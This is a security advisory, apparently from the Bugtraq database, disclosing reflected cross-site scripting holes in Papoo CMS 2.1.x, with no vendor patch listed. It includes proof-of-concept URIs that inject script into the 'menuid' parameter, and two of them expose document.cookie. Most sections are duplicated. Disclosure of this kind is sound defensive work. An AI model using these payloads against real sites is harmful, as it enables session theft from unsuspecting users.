Papoo Multiple Cross-Site Scripting Vulnerabilities
BID:16573
Info
Papoo Multiple Cross-Site Scripting Vulnerabilities
| Bugtraq ID: | 16573 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Feb 09 2006 12:00AM |
| Updated: | Apr 17 2006 09:56PM |
| Credit: | Dj Eyes, Crouz Security Team is credited with the discovery of these vulnerabilities. |
| Vulnerable: |
Papoo Papoo 2.1.5 Papoo Papoo 2.1.4 Papoo Papoo 2.1.2 |
| Not Vulnerable: | |
Discussion
Papoo Multiple Cross-Site Scripting Vulnerabilities
Papoo is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input.
An attacker may leverage these issues to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
Specific information regarding affected versions is not currently available; this BID will be updated as further information is disclosed.
Papoo is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input.
An attacker may leverage these issues to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
Specific information regarding affected versions is not currently available; this BID will be updated as further information is disclosed.
Exploit / POC
Papoo Multiple Cross-Site Scripting Vulnerabilities
An exploit is not required.
The following example URIs were provided to demonstrate these issues:
http://www.example.com/guestbook.php?menuid=<script>alert('HELLO');</script>
http://www.example.com/index.php?menuid=<script>alert(document.cookie);</script>
http://www.example.com/inhalt.php?menuid=<script>alert(document.cookie);</script>
http://www.example.com/forum.php?menuid=<script>alert('HELLO');</script>
http://www.example.com/kontakt.php?menuid=<script>alert('HELLO');</script>
An exploit is not required.
The following example URIs were provided to demonstrate these issues:
http://www.example.com/guestbook.php?menuid=<script>alert('HELLO');</script>
http://www.example.com/index.php?menuid=<script>alert(document.cookie);</script>
http://www.example.com/inhalt.php?menuid=<script>alert(document.cookie);</script>
http://www.example.com/forum.php?menuid=<script>alert('HELLO');</script>
http://www.example.com/kontakt.php?menuid=<script>alert('HELLO');</script>
Solution / Fix
Papoo Multiple Cross-Site Scripting Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected]:[email protected]
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected]:[email protected]
References
Papoo Multiple Cross-Site Scripting Vulnerabilities
References:
References: